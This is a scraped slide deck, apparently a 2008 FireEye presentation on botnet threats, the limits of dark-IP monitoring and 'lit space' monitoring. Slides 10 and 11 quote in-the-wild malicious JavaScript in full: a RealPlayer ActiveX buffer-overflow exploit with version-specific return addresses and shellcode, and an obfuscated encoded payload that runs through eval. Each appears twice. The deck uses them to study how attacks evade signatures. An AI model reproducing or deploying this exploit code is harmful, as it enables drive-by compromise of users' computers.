Download presentation
Presentation is loading. Please wait.
1
Lit Space Monitoring for Botnets Stuart Staniford Chief Scientist 1/21/2008
2
2 Botnets = Targeted Infection + Remote Control Payload Botnet - a collection of compromised PCs (bots) under remote command & control (C&C) to perpetrate a range of criminal activities Remote control payload enables further malicious payload installs Malicious payloads enable monetization via: Spam relay (leased to spammers) DDoS (extortion business model) ID Theft (consumer, business, or gov’t) Intellectual property theft Phishing site hosting Click fraud Online financial services fraud E-commerce site fraud
3
33 Botnets Are A Critical Threat Up to 75% of enterprises will be infiltrated by targeted malware that will evade their traditional defenses by end of 2007 Botnet worm infections can occur even [with] the very latest antivirus signatures and … OS and application patches. Up to a quarter of computers on the net may be used by cyber criminals in so- called botnets - Vint Cerf Botnets: A Global Pandemic
![33 Botnets Are A Critical Threat Up to 75% of enterprises will be infiltrated by targeted malware that will evade their traditional defenses by end of 2007 Botnet worm infections can occur even [with] the very latest antivirus signatures and … OS and application patches.](http://images.slideplayer.com/25/7804172/slides/slide_3.jpg "Up to a quarter of computers on the net may be used by cyber criminals in so- called botnets - Vint Cerf Botnets: A Global Pandemic.")
4
4 Growing Wave of Concern Nuisance Late 1990’s - 2002 Concern 2003 - 2006 Low Danger 2007 - Beyond Botnet Attack Evolution High Magnitude of Threat Consumer Service Provider Enterprise Government Cyber warfare Mass-scale DDoS Mass-scale SPAM Click fraud Identity Theft Phishing Pharming Wide-scale revenue loss Corporate Espionage Total enterprise collapse Intellectual Property Theft Compliance Risks Productivity Loss Brand Damage Resource Inefficiency Cyber-terrorism DDoS SPAM Spyware platform Steal resources
5
Traditional Botnet (first half 2000s) Grow by active scanning Command & Control via IRC
6
6 Still a lot of that about Portion of a botnet tracked by FireEye botwall network
7
Monitoring Traditional Botnets Dark IP Space/Network Telescope Wait for bot to scan, and try to capture
8
Tradeoffs of Dark IP Monitoring Advantages Fidelity - if something scans dark IP, is likely bad Cheap/easy - can cover a lot of IP space that wasn’t being used Especially internally to enterprises Disadvantages Some bots avoid the dark-IP space - scan selectively Persuading the bot to talk can be tricky Need deep interaction honeypot to do it right Bots moving away from scanning as a technique Bot-owners can learn Dark Ips if feedback (eg to signatures)
9
Directions in Botnet Technology Technology evolution is rapid Well funded industry Smart technologists Disciplined execution of attacks and management of resources/business Gives various trends that render current defensive technologies obsolete 1.Exploits via web/email (bypass firewall) 2.Obfuscation and polymorphism (bypass AV/IPS) 3.Distributed command-and-control, and high turnover of assets, 1.renders trackdown and clean-up hard 2.DNS tracking hard 3.Web crawling behind the curve
10
Exploits via web if(user.indexOf("nt 5.")==-1)return;VulObject="I"+"ER"+"PCtl.I"+"ERP"+"Ctl.1";try{Real=new ActiveXObject(VulObject)}catch(error){return}RealVersion=Real.PlayerProperty("PRODUCTVERSION");Padding="";JmpOver=unescape("%75% 06%74%04");for(i=0;i<32*148;i++)Padding+="S";if(RealVersion.indexOf("6.0.14.")==-1){if(navigator.userLanguage.toLowerCase()=="zh- cn")ret=unescape("%7f%a5%60");else if(navigator.userLanguage.toLowerCase()=="en-us")ret=unescape("%4f%71%a4%60");else return}else if(RealVersion=="6.0.14.544")ret=unescape("%63%11%08%60");else if(RealVersion=="6.0.14.550")ret=unescape("%63%11%04%60");else if(RealVersion=="6.0.14.552")ret=unescape("%79%31%01%60");else if(RealVersion=="6.0.14.543")ret=unescape("%79%31%09%60");else if(RealVersion=="6.0.14.536")ret=unescape("%51%11%70%63");else return;if(RealVersion.indexOf("6.0.10.")!=- 1){for(i=0;i<4;i++)Padding=Padding+JmpOver;Padding=Padding+ret}else if(RealVersion.indexOf("6.0.11.")!=- 1){for(i=0;i<6;i++)Padding=Padding+JmpOver;Padding=Padding+ret}else if(RealVersion.indexOf("6.0.12.")!=- 1){for(i=0;i<9;i++)Padding=Padding+JmpOver;Padding=Padding+ret}else if(RealVersion.indexOf("6.0.14.")!=- 1){for(i=0;i<10;i++)Padding=Padding+JmpOver;Padding=Padding+ret}var cuteqqdbug;AdjESP="LLLL\\XXXXXLD";var cuteqqdbug2;cuteqqdbug2=cuteqqdbug;Shell="TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIqpZKtPQKPKUczi3Vx9MCS2k04tvk KNKRKJXkGuJHXkIoYokOeGJo9lynkNoQz4JnmwmJPuKOQemnL2PuNn9rCc2ULVxvpu7yLTHyNGR6vOKOKNKNglgwONqnxFWMNkWtd7NX KjJ6z1LPYnKNJ6LKlLLRj3NJNt9oOWpuKHTVE9YoinKNPkTVruKOKNKNsCQPo9kOYnKNLiLV7qKNynkNgqMxzZ9m6YuiKNmrmPopxPGIMnX zmKLFokKNi9GqmxJV8M7ULmNMlirSnXyVNNnMGqoXyrntMBZ6npLJmJLROZntiomw2UJX26NNkOinKNQewfImONhBPuNVKRt5MVJrImuSN zT58khNynKNkNpuPlaF9nkNKNnvfoOCkktkZ6FonSYKTkNvUgNLMpNM5QkzQz41LxJv6YnXZroCsOXNhoMF1VXL9nynJ6cvXNYnynlVpFxWin InPuYjrJonoIkwkINj9leL5WrWMPJnMOJ6QVYqKOKNlVPFXk9oInofw6vnkNKNt5xzSZLyHGl9lJIlELtG47ophJz4KNZ6okObZmhLofNumKLLnpoZ odKOoWsEZXWf5gYnKNinbUuvkMoNKr1munyvPuOvofKMS5CMK1zNkNozLK2UNQYbymEesOkwz0njLZMBnkMMpuKaKMWeSMmSYninmZo WsEoKynRSmjm6KL8MP7hqQPXnyTWXOzzV7OP7L9ImdtmnVu6oyUx0xVNkKTOnN5n1ymNqhnnNLjJ4IjntxzNKuQOXKVNF5QlHznBQOKInO oDUKSkuNPn2LKm6MNhU8QkMlQXnnNOZJ49jNtKJnKvaLhhfLffamXZjPqoKkNMOsMUkzZweQO3MfYIzgecK0umP9zmzodkJNtnanIuQOX9vv YiilVzVKDKN8MWN46x9XzaegrOdxly7RuGl7snxUiOJJzXBkOKOPu32d3Ly8nOYNNNOloNOnOLonOlo2ST8O9KOKNKNLn5Qy8ZRwqMxZNQe lhyJOOMuNLymuOymeOKMWoKMGoSMgbjZmtnMT5Etwlc9nLfaeNNOOX0ulK8BpulJZpMVImdKI8PumXYNkMDKXMTwMgOOQCkM7KHMteJ QspjNO47XNjl6uoP5Yi9m14mnVutOyUYqLKvyY04590KjkMUsLX0uxrMe1eOPxbKM5s1e8zpuKMGKF5MpmwEm4VfTfcgqS1ZlozpoJRkwwlOsq mk7yWWhsVvWCrShZ5mMRWvOnQtNlvOuYSm0cjLZ4QsNQ8PQQtnSqoZnZOKNkNKNYnynKNynynKNKN9nYnkNynkNkNkNkNkNInlVnjLJLN ktkaN1kwkwyWHPMJmWmYNqLGnuYViVn0omNpJqLVMOlMMZJpmKOvMKKNA";PayLoad=Padding+AdjESP+Shell;while(PayLoad.length<0x 8000)PayLoad+="copyleft";Real["Import"]("c:\\Program Files\\NetMeeting\\TestSnd.wav",PayLoad,"",0,0)}RealExploit();
}RealExploit();](http://images.slideplayer.com/25/7804172/slides/slide_10.jpg "Exploits via web if(user.indexOf( nt 5. )==-1)return;VulObject= I + ER + PCtl.I + ERP + Ctl.1 ;try{Real=new ActiveXObject(VulObject)}catch(error){return}RealVersion=Real.PlayerProperty( PRODUCTVERSION );Padding= ;JmpOver=unescape( %75% 06%74%04 );for(i=0;i<32*148;i++)Padding+= S ;if(RealVersion.indexOf( )==-1){if(navigator.userLanguage.toLowerCase()== zh- cn )ret=unescape( %7f%a5%60 );else if(navigator.userLanguage.toLowerCase()== en-us )ret=unescape( %4f%71%a4%60 );else return}else if(RealVersion== )ret=unescape( %63%11%08%60 );else if(RealVersion== )ret=unescape( %63%11%04%60 );else if(RealVersion== )ret=unescape( %79%31%01%60 );else if(RealVersion== )ret=unescape( %79%31%09%60 );else if(RealVersion== )ret=unescape( %51%11%70%63 );else return;if(RealVersion.indexOf( )!=- 1){for(i=0;i<4;i++)Padding=Padding+JmpOver;Padding=Padding+ret}else if(RealVersion.indexOf( )!=- 1){for(i=0;i<6;i++)Padding=Padding+JmpOver;Padding=Padding+ret}else if(RealVersion.indexOf( )!=- 1){for(i=0;i<9;i++)Padding=Padding+JmpOver;Padding=Padding+ret}else if(RealVersion.indexOf( )!=- 1){for(i=0;i<10;i++)Padding=Padding+JmpOver;Padding=Padding+ret}var cuteqqdbug;AdjESP= LLLL\\XXXXXLD ;var cuteqqdbug2;cuteqqdbug2=cuteqqdbug;Shell= TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIqpZKtPQKPKUczi3Vx9MCS2k04tvk KNKRKJXkGuJHXkIoYokOeGJo9lynkNoQz4JnmwmJPuKOQemnL2PuNn9rCc2ULVxvpu7yLTHyNGR6vOKOKNKNglgwONqnxFWMNkWtd7NX KjJ6z1LPYnKNJ6LKlLLRj3NJNt9oOWpuKHTVE9YoinKNPkTVruKOKNKNsCQPo9kOYnKNLiLV7qKNynkNgqMxzZ9m6YuiKNmrmPopxPGIMnX zmKLFokKNi9GqmxJV8M7ULmNMlirSnXyVNNnMGqoXyrntMBZ6npLJmJLROZntiomw2UJX26NNkOinKNQewfImONhBPuNVKRt5MVJrImuSN zT58khNynKNkNpuPlaF9nkNKNnvfoOCkktkZ6FonSYKTkNvUgNLMpNM5QkzQz41LxJv6YnXZroCsOXNhoMF1VXL9nynJ6cvXNYnynlVpFxWin InPuYjrJonoIkwkINj9leL5WrWMPJnMOJ6QVYqKOKNlVPFXk9oInofw6vnkNKNt5xzSZLyHGl9lJIlELtG47ophJz4KNZ6okObZmhLofNumKLLnpoZ odKOoWsEZXWf5gYnKNinbUuvkMoNKr1munyvPuOvofKMS5CMK1zNkNozLK2UNQYbymEesOkwz0njLZMBnkMMpuKaKMWeSMmSYninmZo WsEoKynRSmjm6KL8MP7hqQPXnyTWXOzzV7OP7L9ImdtmnVu6oyUx0xVNkKTOnN5n1ymNqhnnNLjJ4IjntxzNKuQOXKVNF5QlHznBQOKInO oDUKSkuNPn2LKm6MNhU8QkMlQXnnNOZJ49jNtKJnKvaLhhfLffamXZjPqoKkNMOsMUkzZweQO3MfYIzgecK0umP9zmzodkJNtnanIuQOX9vv YiilVzVKDKN8MWN46x9XzaegrOdxly7RuGl7snxUiOJJzXBkOKOPu32d3Ly8nOYNNNOloNOnOLonOlo2ST8O9KOKNKNLn5Qy8ZRwqMxZNQe lhyJOOMuNLymuOymeOKMWoKMGoSMgbjZmtnMT5Etwlc9nLfaeNNOOX0ulK8BpulJZpMVImdKI8PumXYNkMDKXMTwMgOOQCkM7KHMteJ QspjNO47XNjl6uoP5Yi9m14mnVutOyUYqLKvyY04590KjkMUsLX0uxrMe1eOPxbKM5s1e8zpuKMGKF5MpmwEm4VfTfcgqS1ZlozpoJRkwwlOsq mk7yWWhsVvWCrShZ5mMRWvOnQtNlvOuYSm0cjLZ4QsNQ8PQQtnSqoZnZOKNkNKNYnynKNynynKNKN9nYnkNynkNkNkNkNkNInlVnjLJLN ktkaN1kwkwyWHPMJmWmYNqLGnuYViVn0omNpJqLVMOlMMZJpmKOvMKKNA ;PayLoad=Padding+AdjESP+Shell;while(PayLoad.length<0x 8000)PayLoad+= copyleft ;Real[ Import ]( c:\\Program Files\\NetMeeting\\TestSnd.wav ,PayLoad, ,0,0)}RealExploit();")
11
More obfuscated example function dc(sed){l=sed.length;var b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,11,56,48,57,43,35,36,27,31,0,0,0,0,0,0,53,20,29,7,55,44,8,9,5,49,46,32,16,40,45,18,28,0,42,4,33,39,61,23, 3,2,26,0,0,0,0,52,0,47,14,38,51,59,6,34,13,62,15,12,10,24,17,60,25,41,54,21,37,22,19,50,58,30,1);soot=sed;for(j=Math.ceil(l/b);j>0;j-- ){r='';for(i=Math.min(l,b);i>0;l--,i--){saam=t[soot.charCodeAt(p++)- 48];sttp=saam >8}else{rtk=83;s=6}}dd1="document";dd2="write(r)";eval(dd1+"."+dd2)}}dc("pryoMUyTB6Pw18VUEXicacpoEC9xKapclfjeIUb28iZcNXb4 Ta45pZ9ooUb2HfhDsXkcYfh3BCNgf8N@YJ45EXyi9ZPwkXown8bIs8BTy9k3hvo_k5o@9YV@GDMTzXo3SXBwn8MIGdk31CNISWN@kgV5pR MVId9xKa45pRmeKvy28iZcU5y2oa45acGeK0qIGdk31CN4SWN@Hwy2myMwcUkdQaP_cvP@u9mTlJpTaiZcu8o@kWB_HfhDsXkcCfh3BCNgj vo_S8NIWdP@n9mTGvowYXhIYXkcCibIvvEVf9hdsCVT8ix5kjPThJkIvdE3SCNwWaFIsWVxS6k3mg4TMdEIW5E@ljP_HwiwnXo@1XP_HYyDs UEwWXo@Cw25y0ZTvvo@HYyDsUEwkCVxL6oIQ9hcAxpTau2_S9BTEXi_Q9N@k5owmJkIvdE3SCNwWaFIsWVoQ9N@k5owyiZTvvo@Hwb2 sUkInjEwW6kc1vo_k1kIn5o@1uBwSCV3l9hwyiZTkjPThwb2sUkInjEwW6oguXkIW8PdhyMokaEtWyF6HOFcHgFtkuMDaumTvvo@Hljd15JVmlb 3n5aokaEidXo@udEw1DFeKjh3W8hdlak6yiZTHujIn8PdqdE@nWFcHZPwkXowndiwX5o@FvP_k5ow1OP@s6bd15o@dXo@udEw1e45HuM@ OdP_fDPThljd15JVkiZTHxV5HumTfvE@QW2TOD9VO92UaumTHum0@5aV@9qisvP_fDk3z6ptyiZTHumT6XBwGjj3W8hdlakcfUkdQaP_Eao3l 9hwSChdlaogSWB@Mdowl9VoQ9N@k5owyiZTHumT@vP_fDPxk8B_mbb_GUooQ9N@k5ow1ZB@GdP_hyMUCwMUaumTHu23l9BThbhIWW FdmuqUHwPTpumVSCNIhUbduCVgGXowYCBdyuFdbxF6HxBTkjPThujIn8PdqdE@nejd26GcCZ9VWyF6HxBTVWairW0txWhIn8PdQCkcAxpT mWFraumTHuFdXWm6VWairW0txWhIn8PdQCkcmOG6HxBTKDB@G5kdnab_F9k3W6GUyuFrHiZTHumTQUE@QWMDHYyDsUEwkCVxL6oI Q9hcPxpTmW25HumTHyo@QvEdyumTHu25HumTfvE@QW2TO9qeO92UaumTHuF2BWBwldP_5XhwCXo@mwqUaumTHu2IWXkIbe45HumT fvE@QW2TO9qeulVT9iZTHumTKDB@G5kdnab_F9k3W6GUyiZTHumTC9h3SeEUHumTHu25HumTfvE@QW2TOayoO92UaumTHuF2BWBwl dP_5XhwCXo@mwqUaumTHu2IWXkIbepTHumTHiZTHuMIS8h3HyM_PYq_Ci45HumTHYyDsUEwkCVxL6oIQ9hcAx45HumTHyo@QvEdyumT HumTaumTHZkIuXPTClhUBlVT9iZTHumTKDB@G5kdnab_F9k3W6GtyiZTHumTC9h3SeEUHumTHu25HumTfvE@QW2TO6b2O92UaumTHuF 2BWBwldP_5XhwCXo@mOqUaumTHu2IWXkIbepTHumTHiZTHum3QjkILUP_9umTaumTHuF2BWBwldP_5XhwCXo@mwqUHu25HumTHyo@ QvEdyumTHiZTHgV5HuM@OdP_fDPThYyDsUEwkCVxL6oIQ9h6aumTy0ZTHuMIS8h3HuFt9iZTHumTC9h3SeEUaumTHZkIuXPTHw4UaumT Humwl8kIndEw1amdWXo3myMgQDP@lYPdsvqiW1E3zaP_WuG7AJmdn6oTyiZTHumTC9h3SeEUHu25HumTzXo3SXBwn045HumTHyo@Qv EdyumTHumTHu25HuFrauFragV5abk_18P_k5owHlb3n5aokaEidXo@udEw1DFeK50_Q9N@kiRDauFdXWm6EXJivXo@uaFd1Ck3B5i3hlMoka P3l1N@HJyoHY4gAlF6HOFcHgFtku2@QCh_WaPTClB0@1VTauFdXWm6EXJivXo@uaFd1Ck3B5i3hlMokaP3l1N@HJyoHY4gWlF6HOFcHgFt ku2@QCh_WaPTClVtJ8q_CiZTkjPThwb2xjh3W8VgkaP3QDNxXDMKwdowz5E_uW2xIWF71uqKkuFTmuFgAwmTWXP_L9VwHyM_WxJ_CiZTk jPThwb2xjh3W8VgkaP3QDNxXDMKwdowz5E_uW2xIWm7YwmTSgpTFOG6Hyh3nXV@1W2TOayoO925Hwo3HrFeK50_Q9N@1wowzXPDRjP 6Yljd1CEwO8BTPYqKkuFTmuFgAwmTWXP_L9VwHyM_PYq_CiZTkjPThwb2xjh3W8VgkaP3QDNxXDMKwdowz5E_uWFUBlF6HOFcHgFtku2 @QCh_WaPTClhUBlVTauFdXWm6EXJivXo@uaFd1Ck3B5i3hlMokaPTPrBTnJFUYwmTSgpTFOG6Hyh3nXV@1W2TO6b2O925m0x5pRM@f9 hdsCVcaiZclyJxTd0cacqgNCjxqa45Hu25") Variables and encoding can be polymorphic - not much for signatures to go on
![More obfuscated example function dc(sed){l=sed.length;var b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,11,56,48,57,43,35,36,27,31,0,0,0,0,0,0,53,20,29,7,55,44,8,9,5,49,46,32,16,40,45,18,28,0,42,4,33,39,61,23, 3,2,26,0,0,0,0,52,0,47,14,38,51,59,6,34,13,62,15,12,10,24,17,60,25,41,54,21,37,22,19,50,58,30,1);soot=sed;for(j=Math.ceil(l/b);j>0;j-- ){r= ;for(i=Math.min(l,b);i>0;l--,i--){saam=t[soot.charCodeAt(p++)- 48];sttp=saam >8}else{rtk=83;s=6}}dd1= document ;dd2= write(r) ;eval(dd1+ . +dd2)}}dc( pryoMUyTB6Pw18VUEXicacpoEC9xKapclfjeIUb28iZcNXb Yljd1CEwO8BTPYqKkuFTmuFgAwmTWXP_L9VwHyM_PYq_CiZTkjPThwb2xjh3W8VgkaP3QDNxXDMKwdowz5E_uWFUBlF6HOFcHgFtku2 hdsCVcaiZclyJxTd0cacqgNCjxqa45Hu25 ) Variables and encoding can be polymorphic - not much for signatures to go on](http://images.slideplayer.com/25/7804172/slides/slide_11.jpg "More obfuscated example function dc(sed){l=sed.length;var b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,11,56,48,57,43,35,36,27,31,0,0,0,0,0,0,53,20,29,7,55,44,8,9,5,49,46,32,16,40,45,18,28,0,42,4,33,39,61,23, 3,2,26,0,0,0,0,52,0,47,14,38,51,59,6,34,13,62,15,12,10,24,17,60,25,41,54,21,37,22,19,50,58,30,1);soot=sed;for(j=Math.ceil(l/b);j>0;j-- ){r= ;for(i=Math.min(l,b);i>0;l--,i--){saam=t[soot.charCodeAt(p++)- 48];sttp=saam >8}else{rtk=83;s=6}}dd1= document ;dd2= write(r) ;eval(dd1+ . +dd2)}}dc( pryoMUyTB6Pw18VUEXicacpoEC9xKapclfjeIUb28iZcNXb Yljd1CEwO8BTPYqKkuFTmuFgAwmTWXP_L9VwHyM_PYq_CiZTkjPThwb2xjh3W8VgkaP3QDNxXDMKwdowz5E_uWFUBlF6HOFcHgFtku2 hdsCVcaiZclyJxTd0cacqgNCjxqa45Hu25 ) Variables and encoding can be polymorphic - not much for signatures to go on")
12
Preliminary Expt on open network (Dec) ~ 5000 users ~ 3 hrs of intermittent data Parsed HTTP and entities ~ 200,000 HTTP containing flows Google safe browsing API alerted on ~700 of them Manually verified - only 11 checked out Daily rate is ~100 incidents/day Don’t know how many were successful at this point Not sure how typical this period is so only order of magnitude estimate Google safe browsing API is 99%+ false positives Reasons not well understood yet Gearing up for another experimental run Hopefully LEET 08 paper
13
Distributed Command and Control - Storm Grow by spam/malicious downloads - been running for 12 months now in plain sight No scanning! 115,000 seen from a single.edu eDonkey UDP messages in Peer-to-Peer command and control
14
Dynamic Infrastructure - Fast Flux DNS Servers Small Number of Persistent Content Servers Large Number of Dynamic Proxies
15
FireEye, Inc. Confidential15 Rendering Current Approaches Obsolete GAP Need security solution that scales with exponential nature of threat Antivirus Bypass by not matching AV signatures IDS/IPS Bypass by not matching signatures & using other infection vectors Network Behavior Analysis Bypass by low & slow spread Dark IP Honeypots Bypass by not targeting dark IP addresses and honeypots
16
FireEye, Inc. Confidential16 Lit Space Monitoring
17
FireEye, Inc. Confidential17 Global Deployment Local Analysis & Protection Global Analysis & Intelligence Distribution
18
FireEye, Inc. Confidential Thank you! Q & A
Similar presentations
